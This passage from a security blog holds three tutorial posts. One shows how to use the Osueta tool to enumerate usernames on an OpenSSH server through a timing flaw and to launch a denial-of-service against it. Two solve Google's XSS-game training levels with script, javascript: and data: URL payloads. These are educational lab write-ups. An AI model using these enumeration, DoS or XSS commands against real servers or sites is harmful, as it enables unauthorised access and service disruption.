<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">Thanks to Osueta, we are able to guess the usernames </span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">available</span></span> on the OpenSSH server. So if the usernames have been guessed, we have 50% of the credentials and the time needed</span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> to perform the </span></span>Brute Force attack (by using Username Password combinations) will be reduced because we already know the username.</span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><br /></span></span></div>
<h2 style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">How does this bug work?</span></span></h2>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">With the scenarios below, I will show you how this attack works. </span></span></span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">When we want to connect to an OpenSSH server, we need to type a username and password. </span></span></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> </span></span> <b><u><br /></u></b></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u>Scenario 1</u></b></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><br /></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">If the username doesn't exist, the password is not compared to</span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> the original one.</span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u>Scenario 2</u></b></span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">If the username exists, the password is compared with the original one. If the hash compared is the same, you are granted access to the system. If not, you are rejected.</span></span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u>Scenario 3</u></b></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"></span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"><b><u><br /></u></b></span></span></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">If the username exists and the password typed is for example </span></span>40.000 A's (40000 bytes), the fact of generating the hash of this long password in order to compare it with the original one, makes the system slow down and the time measurement is increased. So if the delay is increased when we use this long password, the username exists.<br />
<br />
The picture below shows the performance of my computer when I tried an invalid username:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPcLRApkDFuL60CJiPOG2F7kppf1W4xchTGdSn6ZoQJkYo4qrPz9c6pgRcMjxB9rbD3DlI1J2Mh19sAgwrdTN0xQdQ-6PlL8ExAVd4RKdOoF1iPE1vPi_tZddWm07ACAHwBmgQ_LtVQ1A/s1600/OpenSSH_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPcLRApkDFuL60CJiPOG2F7kppf1W4xchTGdSn6ZoQJkYo4qrPz9c6pgRcMjxB9rbD3DlI1J2Mh19sAgwrdTN0xQdQ-6PlL8ExAVd4RKdOoF1iPE1vPi_tZddWm07ACAHwBmgQ_LtVQ1A/s1600/OpenSSH_1.png" height="134" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And now, that is the performance while it was being tested with a valid username and a password of 40000 bytes:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzseJIIOrO4JoE68ItpYJhn8JKk_tteWUE0qNju8rlS1Tz7WXWybyiYnDD4I_jM-Htu_b8N7ViAMVNS9MdF7WdxezGzZtVFIy6d95beSmkd6R-HzoWOy2XLhvtVNZO3_qBYEI4d0i4Kgk/s1600/OpenSSH2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzseJIIOrO4JoE68ItpYJhn8JKk_tteWUE0qNju8rlS1Tz7WXWybyiYnDD4I_jM-Htu_b8N7ViAMVNS9MdF7WdxezGzZtVFIy6d95beSmkd6R-HzoWOy2XLhvtVNZO3_qBYEI4d0i4Kgk/s1600/OpenSSH2.png" height="144" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">Find more info about this bug <a href="https://cureblog.de/2013/07/openssh-user-enumeration-time-based-attack/" target="_blank">OpenSSH User Enumeration Time-Based Attack</a></span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> </span></span><span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps"> </span></span><br />
<br />
<span class="short_text" id="result_box" lang="en" tabindex="-1"><span class="hps">Notice that </span></span>OpenSSH 5.* 6.* servers are affected...</div>
<h2 style="text-align: justify;">
Working with Osueta</h2>
<div style="text-align: justify;">
Ok. We have learned a little bit more from this bug and now it is the time to take advantage of it.<br />
<br />
Before starting, we need to install the packages below:<br />
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
# apt-get install python-ipy python-nmap python-paramiko </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Then, we can download <a href="https://github.com/c0r3dump3d/osueta" target="_blank">Osueta</a> from Github:</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
$ git clone https://github.com/c0r3dump3d/osueta.git<br />
<br />
Notice the first thing Osueta does when it is executed, is to test 10 random users to check the server delay in order to know how much time we can expect to wait (in normal conditions) until a reply is received from the server. Osueta establishes a rate limit and if it is <span class="short_text" id="result_box" lang="en"><span class="hps">exceeded, the user exits.</span></span><br />
<br />
<u>Example 1.</u> Guessing if a single user if it is available.</div>
<div style="text-align: justify;">
<br />
./osueta.py -H 127.0.0.1 -U jnieto -p 22 <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtxU6dJXdlAqicdPwlJ08lzO1rYFaqIIARmQWE9oyx1ZVJFmzwXIKs8SN1fgtqQn7-WxuHkh4ayQBOaT8n5ioQ-Iu6Go1qi1nGN1h9dn2Krk_d_liFDtuFAlkDGNGPwYvp4a4UqyMbt8/s1600/Osueta_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtxU6dJXdlAqicdPwlJ08lzO1rYFaqIIARmQWE9oyx1ZVJFmzwXIKs8SN1fgtqQn7-WxuHkh4ayQBOaT8n5ioQ-Iu6Go1qi1nGN1h9dn2Krk_d_liFDtuFAlkDGNGPwYvp4a4UqyMbt8/s1600/Osueta_1.png" height="299" width="320" /></a></div>
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Example 2.</u> Guessing usernames from a list. <br />
<br />
./osueta.py -H 127.0.0.1 -L users.txt -p 22 </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4IcoiP4XX6Drh8NiQkmZlKGmh8FRBScVLbaMl6yHM8IWDXtS_YVEg2IPPGj7dgPqHU-gdxUK_lBCBtoDAef_dzgoG0ANbAeI3Ex2IOtgoe24hnv_iDIDHN0i9YpitbPobUgUQ2bJevww/s1600/Osueta_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4IcoiP4XX6Drh8NiQkmZlKGmh8FRBScVLbaMl6yHM8IWDXtS_YVEg2IPPGj7dgPqHU-gdxUK_lBCBtoDAef_dzgoG0ANbAeI3Ex2IOtgoe24hnv_iDIDHN0i9YpitbPobUgUQ2bJevww/s1600/Osueta_2.png" height="320" width="276" /></a></div>
<br /></div>
<div style="text-align: justify;">
<br />
<u>Example 3.</u> Trying a DOS of the OpenSSH service. Notice you need to know or to guess a username to perform a DOS attack.<br />
<br />
./osueta.py -H 127.0.0.1 -p 22 -U jnieto -v no --dos yes<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMiDUhs4aLNGuBWcvHX0lOe2Ex6LwZijtTP-DYry1xWfK2bcwYHmzzkm7B_RDEHMdOsEVG67tjr3ay6gdBdlMKpLCQaoYvsvf9P9Tj7UJBUjmPQyIu3XvzNgM-BbQD0Jp4U-BQssw9CVk/s1600/Osueta_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMiDUhs4aLNGuBWcvHX0lOe2Ex6LwZijtTP-DYry1xWfK2bcwYHmzzkm7B_RDEHMdOsEVG67tjr3ay6gdBdlMKpLCQaoYvsvf9P9Tj7UJBUjmPQyIu3XvzNgM-BbQD0Jp4U-BQssw9CVk/s1600/Osueta_4.png" height="250" width="640" /></a></div>
<br />
You can see the result of this attack in the picture below... The CPU is up to 100% and there are a lot of connections to the OpenSSH server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWuvC4vYRSdRLAXoyy1QFyFO9bA7GGcF8SwOf9ASCGByXBTWh_00esmMh6hBR1hEKbkvUCYOlWb1QrlZESLc4Q4DIGGlrhowXqSHmeUTPBvVMe7UqU6MbN-TwbSfvRUcGFouAfej5vWQ/s1600/Osueta_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXWuvC4vYRSdRLAXoyy1QFyFO9bA7GGcF8SwOf9ASCGByXBTWh_00esmMh6hBR1hEKbkvUCYOlWb1QrlZESLc4Q4DIGGlrhowXqSHmeUTPBvVMe7UqU6MbN-TwbSfvRUcGFouAfej5vWQ/s1600/Osueta_3.png" height="309" width="640" /></a></div>
<br />
When the number of sessions is reached, the machine starts to reject the rest of connections causing a DOS.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR9HtjwiRaxEpqZlNebWp0-6NiX7uMFm8ZaM55VS7iPvsK1KktZE9Y_c_NzJI73yj8SmcX4bxoUPygI62CxNj8vA__UvrElN8wc-J3ROwYgEweV2v1SoDouZz6pRb6j8iYaCjd_mykDk/s1600/Osueta_last.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR9HtjwiRaxEpqZlNebWp0-6NiX7uMFm8ZaM55VS7iPvsK1KktZE9Y_c_NzJI73yj8SmcX4bxoUPygI62CxNj8vA__UvrElN8wc-J3ROwYgEweV2v1SoDouZz6pRb6j8iYaCjd_mykDk/s1600/Osueta_last.png" /></a></div>
<br />
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com3tag:blogger.com,1999:blog-3160485247929481680.post-67429714879174220022014-06-06T08:56:00.000-07:002014-06-06T09:00:21.182-07:00XSS-game by Google exercises 4, 5 and 6.<br />
<div style="text-align: justify;">
In the previous post we talked about how to resolve the exercises <a href="http://www.behindthefirewalls.com/2014/06/xss-game-by-google-exercises-1-2-and-3.html" target="_blank">1, 2 and 3 of the XSS-game</a> proposed by Google. Now, we are going to resolve the latest ones. </div>
<h2>
Exercise 4 </h2>
<div class="separator" style="clear: both; text-align: justify;">
This exercise is similar to the previous one (Exercise 3). The main difference is that now, we have an input. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuKCcf3878-OIdG1-OVSAyTVB7PFfsewdocLY19QXG_DbdW581NBU1V-858t8IzC9sgm62mxRE2_P7S4MH1DrcA2Sw4W1oS9cHyVWO6pKli_e78brSWacVgz9W1iZ4vx-rO7RbmnZz3h0/s1600/XSS_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuKCcf3878-OIdG1-OVSAyTVB7PFfsewdocLY19QXG_DbdW581NBU1V-858t8IzC9sgm62mxRE2_P7S4MH1DrcA2Sw4W1oS9cHyVWO6pKli_e78brSWacVgz9W1iZ4vx-rO7RbmnZz3h0/s1600/XSS_4.png" /></a></div>
It is expected that a number will be typed into the box, but... what will happen if we write a name instead of typing a number?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPfCwJFt-NJouIPki7ju4plwjt-GqqSSe0iJnTtgjcwoRWURt7eptRq4ARJqMw2uEkaMbc7Iuyj6iz0zoX-hjnhyLKHjjAhbqOEoGBQXzPo-JOn_shwYPTbGvrmPHXoHYmg_-x6pSx-k/s1600/XSS4_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPfCwJFt-NJouIPki7ju4plwjt-GqqSSe0iJnTtgjcwoRWURt7eptRq4ARJqMw2uEkaMbc7Iuyj6iz0zoX-hjnhyLKHjjAhbqOEoGBQXzPo-JOn_shwYPTbGvrmPHXoHYmg_-x6pSx-k/s1600/XSS4_1.png" height="155" width="640" /></a></div>
<br />
<br />
What happens is that our string has been included into the "img" tag...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqCHVA9JxrdKzeq7pmuvnSL98p3MafBHh9mKgG5oFFc0BrasVZRbJEyFz5905dmUSNW0ikKpOwXY2yQW6fQtpcSdNYKIx6PyeeZhkUvUTRI66hEx9PadEJPFEkdHeSbhpCdkZa9sV2RAU/s1600/XSS_4_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqCHVA9JxrdKzeq7pmuvnSL98p3MafBHh9mKgG5oFFc0BrasVZRbJEyFz5905dmUSNW0ikKpOwXY2yQW6fQtpcSdNYKIx6PyeeZhkUvUTRI66hEx9PadEJPFEkdHeSbhpCdkZa9sV2RAU/s1600/XSS_4_2.png" /></a></div>
<br />
So, if we use: <span style="font-family: "Courier New",Courier,monospace;">3');alert('Behindthefirewalls <span style="font-family: Arial, Helvetica, sans-serif;">the result would be...</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWXKFosH-XVpvYg8A6W47ZQHgIahMZ_yyb7jX9eSP7vuNnQ1YDDWO0OvGdrnwj2AZOo9xHjcMz7II6ERTH1pPsYf3odZ4C1GFGpHivA62myoTT4AB9dp4idH2Ho_d4D-BeWDaEv7lRoHE/s1600/XSS4_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWXKFosH-XVpvYg8A6W47ZQHgIahMZ_yyb7jX9eSP7vuNnQ1YDDWO0OvGdrnwj2AZOo9xHjcMz7II6ERTH1pPsYf3odZ4C1GFGpHivA62myoTT4AB9dp4idH2Ho_d4D-BeWDaEv7lRoHE/s1600/XSS4_4.png" /></a></div>
<br />
<br />
And the alert appears...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDg3wZFbO0fm_rZx3QTkzXbr2dFAE9QT04C144oNqr8ZFRiZijNeyA46eybMbuaZaKyBHtVk8JA9GqfjbGcNaLSVNHo33WTnE4OC5UZDyXP-Awn02WQNOozFis8Xfn-hgiWFAPSBJU_Uc/s1600/XSS_4_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDg3wZFbO0fm_rZx3QTkzXbr2dFAE9QT04C144oNqr8ZFRiZijNeyA46eybMbuaZaKyBHtVk8JA9GqfjbGcNaLSVNHo33WTnE4OC5UZDyXP-Awn02WQNOozFis8Xfn-hgiWFAPSBJU_Uc/s1600/XSS_4_3.png" height="271" width="640" /></a></div>
<h2>
Exercise 5 </h2>
<div style="text-align: justify;">
I don't know what the reason for looking at "next=confirm" was at first because logic would dictate that the first attempt would be to try to exploit a XSS vulnerability in the input field...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-yE1VOZYGkRdF_pXGBAFsrSC-Nef4YA8OKsZNSkVxfl3wl6w6v9O3BHPCyF__x7LJ3PPQNdMfu_9uLz6UobPISWz3o-fFDJQ5cgI7xUIhgbyn2-tkW2C3eaIEDvz24M3Kau2WYoMeJmw/s1600/XSS5_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-yE1VOZYGkRdF_pXGBAFsrSC-Nef4YA8OKsZNSkVxfl3wl6w6v9O3BHPCyF__x7LJ3PPQNdMfu_9uLz6UobPISWz3o-fFDJQ5cgI7xUIhgbyn2-tkW2C3eaIEDvz24M3Kau2WYoMeJmw/s1600/XSS5_1.png" height="226" width="640" /></a></div>
<br />
<div style="text-align: justify;">
But the first thing that I did was to replace "confirm" by "http://www.behindthefirewalls", reload the page, type my mail and click on "Next" and the result was that I was redirected to my blog...</div>
<div style="text-align: justify;">
<br /></div>
<span style="font-family: "Courier New",Courier,monospace;">https://xss-game.appspot.com/level5/frame/signup?next=http://www.behindthefirewalls.com</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5B93ptRxIjTbkSNMhznH9gugHYqNtgz3tqn44hVl6X7NgjAIMJOBd-KSE1e0Tc6VNvpE3GKneAgKiSpVOZCAWH5dbvM9Eux7LLAdnfPSOk8UurTLSOeF-QEEM_U-jCcnE7o5rv2Eohq8/s1600/XSS3_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5B93ptRxIjTbkSNMhznH9gugHYqNtgz3tqn44hVl6X7NgjAIMJOBd-KSE1e0Tc6VNvpE3GKneAgKiSpVOZCAWH5dbvM9Eux7LLAdnfPSOk8UurTLSOeF-QEEM_U-jCcnE7o5rv2Eohq8/s1600/XSS3_2.png" height="222" width="640" /></a></div>
<br />
<div style="text-align: justify;">
We have discovered another security issue but what we want to do is locate a XSS vulnerability.</div>
<br />
<div style="text-align: justify;">
I was trying different options with no success so I decided to read the hints offered by Google. "If you want to make clicking a link execute Javascript (without using
the <code>onclick</code> handler), how can you do it?"</div>
<br />
<div style="text-align: justify;">
<span style="font-family: inherit;">So I tried to use:</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
n<span style="font-family: "Courier New",Courier,monospace;">ext=javascript:alert("behindthefirewalls")</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">And the alert appeared.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPgQWLtCXRmJgmp3u8HI7JJNM5g6Nnfa8qfIA3SwGZiDmJvK5raElGikmvZFxmI7U64Uj-D9Mqqw8vCmjCEaGNFwDCn5TycKZXpBuPOb55fEP8e7ETkpEh7Xvf4KPLipFxi39w_Sxgg6c/s1600/XSS5_9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPgQWLtCXRmJgmp3u8HI7JJNM5g6Nnfa8qfIA3SwGZiDmJvK5raElGikmvZFxmI7U64Uj-D9Mqqw8vCmjCEaGNFwDCn5TycKZXpBuPOb55fEP8e7ETkpEh7Xvf4KPLipFxi39w_Sxgg6c/s1600/XSS5_9.PNG" height="244" width="640" /></a></div>
<h2>
Exercise 6 </h2>
<div style="text-align: justify;">
The fourth hit says: "If you can't easily host your own evil JS file, see if google.com/jsapi?callback=foo will help you here."</div>
<br />
<div style="text-align: justify;">
If we change "foo" for "alert" <a href="http://www.google.com/jsapi?callback=alert" target="_blank">www.google.com/jsapi?callback=alert</a> will have included in its code:</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMn6q66WdolD9NUynpxvRxrcq09CJv9FXOdCeRzL-zmjsAL6Bo-OfFZXZBJayW2027WCZj8IWdQgPAz8Ud4KEotViS29_s865f2CF8JuiYsQslGEokTb8oQO5cSLjzjqzukFHe3Tg_dJg/s1600/XSS_6_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMn6q66WdolD9NUynpxvRxrcq09CJv9FXOdCeRzL-zmjsAL6Bo-OfFZXZBJayW2027WCZj8IWdQgPAz8Ud4KEotViS29_s865f2CF8JuiYsQslGEokTb8oQO5cSLjzjqzukFHe3Tg_dJg/s1600/XSS_6_0.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So, if we use the link bellow, we can exploit the vulnerability.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">frame#//www.google.com/jsapi?callback=alert </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXLMSl12HIHOLCAUSK-vul9UBWhiwoQ0i-YTTLYrI48K4jtwHbcVcClq8Q_1j7WyC-8TPhwsCrudh_SCEbK6OYS6D8WUs5-BigN-fmkGvnjJ_5iNXW7rFkqB0cNCvgAnfM-kkMTDmVw8/s1600/XSS_0_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXLMSl12HIHOLCAUSK-vul9UBWhiwoQ0i-YTTLYrI48K4jtwHbcVcClq8Q_1j7WyC-8TPhwsCrudh_SCEbK6OYS6D8WUs5-BigN-fmkGvnjJ_5iNXW7rFkqB0cNCvgAnfM-kkMTDmVw8/s1600/XSS_0_1.png" height="248" width="640" /></a></div>
<br />
<br />
I spent some time trying to solve this exercise in a different way. I tried a lot of possibilities to exploit a XSS vulnerability...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpwfQgfUxet9ZWzozvL72fmEH0l4EHbjTJKZX_7mz5viv4vfuLHGZ2eQxxFHRpuzmtQP7JXl6ZKUl6wHos5XwW7YKBoEozN5-xVunqiV8Cf0rJEmr_x2Fz8_tKc6Q3zLt5UJdI7Le8po/s1600/XSS6_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpwfQgfUxet9ZWzozvL72fmEH0l4EHbjTJKZX_7mz5viv4vfuLHGZ2eQxxFHRpuzmtQP7JXl6ZKUl6wHos5XwW7YKBoEozN5-xVunqiV8Cf0rJEmr_x2Fz8_tKc6Q3zLt5UJdI7Le8po/s1600/XSS6_1.png" height="204" width="640" /></a></div>
<br />
<br />
... until I remembered a post I read some months ago... <br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">#data:text/javascript,alert('behindthefirewalls')</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKFp9H0V8IcVMrcHXQ-PmL5Tdyce0K4c-8lSI4etnfKZZtkbDgl4koic6eFE7l9jcLEG4nav1DnTUqNxJdbvBvXUI1tyiraZyqD3aG2rrbWDVW3dXQS9t1ypPhuIQ7iHXkyERy7GOWGgg/s1600/XSS6_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKFp9H0V8IcVMrcHXQ-PmL5Tdyce0K4c-8lSI4etnfKZZtkbDgl4koic6eFE7l9jcLEG4nav1DnTUqNxJdbvBvXUI1tyiraZyqD3aG2rrbWDVW3dXQS9t1ypPhuIQ7iHXkyERy7GOWGgg/s1600/XSS6_2.png" height="242" width="640" /></a></div>
<br />
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com3tag:blogger.com,1999:blog-3160485247929481680.post-80788528766630200772014-06-04T23:43:00.000-07:002014-06-04T23:47:14.291-07:00 XSS-game by Google exercises 1, 2 and 3.<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
As Google say, "Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps..."</div>
<br />
<div style="text-align: justify;">
So they have decided to help us to learn how to exploit these kinds of vulnerabilities by creating a vulnerable web site at:<br />
<br />
<a href="https://xss-game.appspot.com/" target="_blank">https://xss-game.appspot.com/</a></div>
<br />
There are 6 exercises to resolve. Before starting to resolve these issues... Why should I know how to exploit a XSS vulnerability?<br />
<br />
<ol>
<li>To be more qualified in the security field.</li>
<li>To make money.</li>
</ol>
<div style="text-align: justify;">
Currently, Google is paying up to $7,500 for dangerous XSS bugs discovered in their most sensitive products.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8Id4TS_qpHAt5GQKPIKbrw8_4uM_loLGqWFaYkK4VaPl1QwmGwXvQSPgd2Z0i97jOECBeJ8eq-XKWCtNRJTGJOVjVsrNLrmXs0hz5HgAZ72GecGK1p7Rc0QVgH7UVWx3dgDEd3__qCE/s1600/Google_Rewards.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8Id4TS_qpHAt5GQKPIKbrw8_4uM_loLGqWFaYkK4VaPl1QwmGwXvQSPgd2Z0i97jOECBeJ8eq-XKWCtNRJTGJOVjVsrNLrmXs0hz5HgAZ72GecGK1p7Rc0QVgH7UVWx3dgDEd3__qCE/s1600/Google_Rewards.png" height="194" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But Google is not the only one who is paying a bounty for disclosing vulnerabilities. Others like Yahoo, Facebook or Paypal have the same policy of rewards for discovering bugs.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In this post, we are going to resolve 3 issues proposed by Google. In the next post, we will resolve the latest ones.</div>
<h2 style="text-align: justify;">
Exercise 1</h2>
<div style="text-align: justify;">
That is the easiest exercise. Our input will be directly included in the page without proper escaping.</div>
<br />
By inserting the code below, we will be successful. <br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><script>alert('BehindTheFirewalls')</script></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx7eLmY86hsieTXXKIz40WimfhrFguCPWP9g5Y57iZziFeX0Dn4tTMgwQ6fgerMmCRSjcujgcJq-DHVUWMU4Q6oyOCXoRkStcO6No7zrv6uvyVf5FcHPZum5SG18BsqoitJLx_5bNBnOY/s1600/XSS_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx7eLmY86hsieTXXKIz40WimfhrFguCPWP9g5Y57iZziFeX0Dn4tTMgwQ6fgerMmCRSjcujgcJq-DHVUWMU4Q6oyOCXoRkStcO6No7zrv6uvyVf5FcHPZum5SG18BsqoitJLx_5bNBnOY/s1600/XSS_1.png" height="342" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
